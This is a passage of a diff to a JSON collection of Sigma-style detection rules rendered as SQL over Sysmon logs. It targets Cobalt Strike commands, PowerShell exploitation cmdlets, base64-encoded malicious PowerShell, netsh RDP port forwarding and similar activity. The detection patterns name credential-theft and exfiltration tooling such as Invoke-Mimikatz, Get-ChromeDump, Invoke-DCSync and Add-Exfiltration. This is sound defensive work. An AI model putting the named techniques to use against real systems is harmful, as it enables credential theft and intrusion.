"proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" + "filename": "proc_creation_win_cmd_curl_download_exec_combo.yml" }, { - "title": "MSHTA Suspicious Execution 01", - "id": "cc7abbd0-762b-41e3-8a26-57ad50d2eea3", - "status": "test", - "description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism", - "author": "Diego Perez (@darkquassar), Markus Neis, 
Swisscom (Improve Rule)", + "title": "DLL Sideloading by VMware Xfer Utility", + "id": "ebea773c-a8f1-42ad-a856-00cb221966e8", + "status": "experimental", + "description": "Detects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1140", - "attack.t1218.005", - "attack.execution", - "attack.t1059.007", - "cve.2020.1599" + "attack.t1574.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\mshta.exe' ESCAPE '\\' AND (CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.lnk%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_susp_execution.yml" + "filename": "proc_creation_win_dll_sideload_vmware_xfer.yml" }, { - "title": "PUA- IOX Tunneling Tool Execution", - "id": "d7654f02-e04b-4934-9838-65c46f187ebc", + "title": "Operator Bloopers Cobalt Strike Commands", + "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", "status": "experimental", - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", + 
"author": "_pete_0, TheDFIRReport", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\iox.exe' ESCAPE '\\' OR (CommandLine LIKE '%.exe fwd -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe fwd -r %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -l %' ESCAPE '\\' OR CommandLine LIKE '%.exe proxy -r %' ESCAPE '\\') OR (Hashes LIKE '%MD5=9DB2D314DD3F704A02051EF5EA210993%' ESCAPE '\\' OR Hashes LIKE '%SHA1=039130337E28A6623ECF9A0A3DA7D92C5964D8DD%' ESCAPE '\\' OR Hashes LIKE '%SHA256=C6CF82919B809967D9D90EA73772A8AA1C1EB3BC59252D977500F64F1A0D6731%' ESCAPE '\\') OR md5 = '9db2d314dd3f704a02051ef5ea210993' OR sha1 = '039130337e28a6623ecf9a0a3da7d92c5964d8dd' OR sha256 = 'c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_iox.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" }, { - "title": "Run PowerShell Script from ADS", - "id": "45a594aa-1fbd-4972-a809-ff5a99dd81b8", - "status": "test", - 
"description": "Detects PowerShell script execution from Alternate Data Stream (ADS)", - "author": "Sergey Soldatov, Kaspersky Lab, oscd.community", + "title": "Malicious PowerShell Commandlets - ProcessCreation", + "id": "02030f2f-6199-49ec-b258-ea71b07e03dc", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%Get-Content%' ESCAPE '\\' AND CommandLine LIKE '%-Stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Add-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Add-Persistence%' ESCAPE '\\' OR CommandLine LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Check-VM%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR CommandLine LIKE '%Decrypt-Hash%' ESCAPE '\\' OR CommandLine LIKE '%Disable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Disable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Do-Exfiltration%' ESCAPE '\\' OR CommandLine LIKE '%Enable-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Enable-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE 
'%Enabled-DuplicateToken%' ESCAPE '\\' OR CommandLine LIKE '%Exploit-Jboss%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADR%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRCSV%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRExcel%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRHTML%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRJSON%' ESCAPE '\\' OR CommandLine LIKE '%Export-ADRXML%' ESCAPE '\\' OR CommandLine LIKE '%Find-Fruit%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR CommandLine LIKE '%Get-ADIDNS%' ESCAPE '\\' OR CommandLine LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR CommandLine LIKE '%Get-ChromeDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR CommandLine LIKE '%Get-FoxDump%' ESCAPE '\\' OR CommandLine LIKE '%Get-GPPPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-IndexedItem%' ESCAPE '\\' OR CommandLine LIKE '%Get-KerberosAESKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-Keystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-LSASecret%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Get-MachineAccountCreator%' ESCAPE '\\' OR CommandLine LIKE '%Get-PassHashes%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR CommandLine LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR CommandLine LIKE '%Get-RickAstley%' ESCAPE '\\' OR CommandLine LIKE '%Get-Screenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR CommandLine LIKE '%Get-ServicePermission%' ESCAPE '\\' OR 
CommandLine LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR CommandLine LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR CommandLine LIKE '%Get-System%' ESCAPE '\\' OR CommandLine LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR CommandLine LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR CommandLine LIKE '%Get-Unconstrained%' ESCAPE '\\' OR CommandLine LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR CommandLine LIKE '%Get-VaultCredential%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR CommandLine LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR CommandLine LIKE '%Grant-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR CommandLine LIKE '%HTTP-Login%' ESCAPE '\\' OR CommandLine LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR CommandLine LIKE '%Install-SSP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADRecon%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AgentSmith%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Certify%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DAFT%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DCSync%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DNSUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-DowngradeAccount%' ESCAPE 
'\\' OR CommandLine LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Farmer%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Gopher%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Grouper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Lockless%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MITM6%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PortScan%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-PsExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PSInject%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RunAs%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SCShell%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharp%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StandIn%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tater%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Whisker%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WireTap%' ESCAPE '\\' OR CommandLine LIKE 
'%Invoke-WmiCommand%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR CommandLine LIKE '%MailRaider%' ESCAPE '\\' OR CommandLine LIKE '%New-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%New-DNSRecordArray%' ESCAPE '\\' OR CommandLine LIKE '%New-HoneyHash%' ESCAPE '\\' OR CommandLine LIKE '%New-InMemoryModule%' ESCAPE '\\' OR CommandLine LIKE '%New-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%New-SOASerialNumberArray%' ESCAPE '\\' OR CommandLine LIKE '%Out-Minidump%' ESCAPE '\\' OR CommandLine LIKE '%Port-Scan%' ESCAPE '\\' OR CommandLine LIKE '%PowerBreach%' ESCAPE '\\' OR CommandLine LIKE '%powercat %' ESCAPE '\\' OR CommandLine LIKE '%PowerUp%' ESCAPE '\\' OR CommandLine LIKE '%PowerView%' ESCAPE '\\' OR CommandLine LIKE '%Remove-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Remove-MachineAccount%' ESCAPE '\\' OR CommandLine LIKE '%Remove-Update%' ESCAPE '\\' OR CommandLine LIKE '%Rename-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Revoke-ADIDNSPermission%' ESCAPE '\\' OR CommandLine LIKE '%Set-ADIDNSNode%' ESCAPE '\\' OR CommandLine LIKE '%Set-MacAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-MachineAccountAttribute%' ESCAPE '\\' OR CommandLine LIKE '%Set-Wallpaper%' ESCAPE '\\' OR CommandLine LIKE '%Show-TargetScreen%' ESCAPE '\\' OR CommandLine LIKE '%Start-CaptureServer%' ESCAPE '\\' OR CommandLine LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR CommandLine LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_ads.yml" + "filename": "proc_creation_win_powershell_malicious_cmdlets.yml" }, { - "title": "Suspicious Use of CSharp Interactive Console", - "id": "a9e416a8-e613-4f8b-88b8-a7d1d1af2f61", + "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", + "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", "status": "test", - "description": "Detects the execution of CSharp 
interactive console by PowerShell", - "author": "Michael R. (@nahamike01)", + "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.execution", - "attack.t1127" + "attack.lateral_movement", + "attack.defense_evasion", + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Possible depending on environment. Pair with other factors such as net connections, command-line args, etc." + "Legitimate administration activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\csi.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND OriginalFileName = 'csi.exe')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csi_use_of_csharp_console.yml" + "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" }, { - "title": "Ps.exe Renamed SysInternals Tool", - "id": "18da1007-3f26-470f-875d-f77faf1cab31", - "status": "test", - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - PowerTool Execution", + "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "status": "experimental", + "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload 
drivers, and delete the driver files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ], "falsepositives": [ - "Renamed SysInternals tool" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine = 'ps.exe -accepteula')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml" + "filename": "proc_creation_win_hktl_powertool.yml" }, { - "title": "Malicious Base64 Encoded PowerShell Keywords in Command Lines", - "id": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "title": "Disabled Volume Snapshots", + "id": "dee4af55-1f22-4e1d-a9d2-4bdc7ecb472a", "status": "test", - "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", - "author": "John Lambert (rule)", + "description": "Detects commands that temporarily turn off Volume Snapshots", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '% hidden %' ESCAPE '\\' AND (CommandLine LIKE '%AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%aXRzYWRtaW4gL3RyYW5zZmVy%' ESCAPE '\\' OR CommandLine LIKE 
'%IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%JpdHNhZG1pbiAvdHJhbnNmZX%' ESCAPE '\\' OR CommandLine LIKE '%YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%Yml0c2FkbWluIC90cmFuc2Zlc%' ESCAPE '\\' OR CommandLine LIKE '%AGMAaAB1AG4AawBfAHMAaQB6AGUA%' ESCAPE '\\' OR CommandLine LIKE '%JABjAGgAdQBuAGsAXwBzAGkAegBlA%' ESCAPE '\\' OR CommandLine LIKE '%JGNodW5rX3Npem%' ESCAPE '\\' OR CommandLine LIKE '%QAYwBoAHUAbgBrAF8AcwBpAHoAZQ%' ESCAPE '\\' OR CommandLine LIKE '%RjaHVua19zaXpl%' ESCAPE '\\' OR CommandLine LIKE '%Y2h1bmtfc2l6Z%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg%' ESCAPE '\\' OR CommandLine LIKE '%lPLkNvbXByZXNzaW9u%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA%' ESCAPE '\\' OR CommandLine LIKE '%SU8uQ29tcHJlc3Npb2%' ESCAPE '\\' OR CommandLine LIKE '%Ty5Db21wcmVzc2lvb%' ESCAPE '\\' OR CommandLine LIKE '%AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ%' ESCAPE '\\' OR CommandLine LIKE '%kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA%' ESCAPE '\\' OR CommandLine LIKE '%lPLk1lbW9yeVN0cmVhb%' ESCAPE '\\' OR CommandLine LIKE '%SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A%' ESCAPE '\\' OR CommandLine LIKE '%SU8uTWVtb3J5U3RyZWFt%' ESCAPE '\\' OR CommandLine LIKE '%Ty5NZW1vcnlTdHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%4ARwBlAHQAQwBoAHUAbgBrA%' ESCAPE '\\' OR CommandLine LIKE '%5HZXRDaHVua%' ESCAPE '\\' OR CommandLine LIKE '%AEcAZQB0AEMAaAB1AG4Aaw%' ESCAPE '\\' OR CommandLine LIKE '%LgBHAGUAdABDAGgAdQBuAGsA%' ESCAPE '\\' OR CommandLine LIKE '%LkdldENodW5r%' ESCAPE '\\' OR CommandLine LIKE '%R2V0Q2h1bm%' ESCAPE '\\' OR CommandLine LIKE '%AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A%' ESCAPE '\\' OR CommandLine LIKE '%QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA%' ESCAPE '\\' OR CommandLine LIKE '%RIUkVBRF9JTkZPNj%' ESCAPE '\\' OR CommandLine LIKE '%SFJFQURfSU5GTzY0%' ESCAPE '\\' OR CommandLine LIKE 
'%VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA%' ESCAPE '\\' OR CommandLine LIKE '%VEhSRUFEX0lORk82N%' ESCAPE '\\' OR CommandLine LIKE '%AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA%' ESCAPE '\\' OR CommandLine LIKE '%cmVhdGVSZW1vdGVUaHJlYW%' ESCAPE '\\' OR CommandLine LIKE '%MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA%' ESCAPE '\\' OR CommandLine LIKE '%NyZWF0ZVJlbW90ZVRocmVhZ%' ESCAPE '\\' OR CommandLine LIKE '%Q3JlYXRlUmVtb3RlVGhyZWFk%' ESCAPE '\\' OR CommandLine LIKE '%QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA%' ESCAPE '\\' OR CommandLine LIKE '%0AZQBtAG0AbwB2AGUA%' ESCAPE '\\' OR CommandLine LIKE '%1lbW1vdm%' ESCAPE '\\' OR CommandLine LIKE '%AGUAbQBtAG8AdgBlA%' ESCAPE '\\' OR CommandLine LIKE '%bQBlAG0AbQBvAHYAZQ%' ESCAPE '\\' OR CommandLine LIKE '%bWVtbW92Z%' ESCAPE '\\' OR CommandLine LIKE '%ZW1tb3Zl%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Services\\\\VSS\\\\Diag%' ESCAPE '\\' AND CommandLine LIKE '%/d Disabled%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_hidden_b64_cmd.yml" + "filename": "proc_creation_win_reg_volsnap_disable.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - CLI", - "id": "baef1ec6-2ca9-47a3-97cc-4cf2bda10b77", + "title": "HackTool - Sliver C2 Implant Activity Pattern", + "id": "42333b2c-b425-441c-b70e-99404a17170f", "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process activity patterns as seen being used by Sliver C2 framework implants", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" 
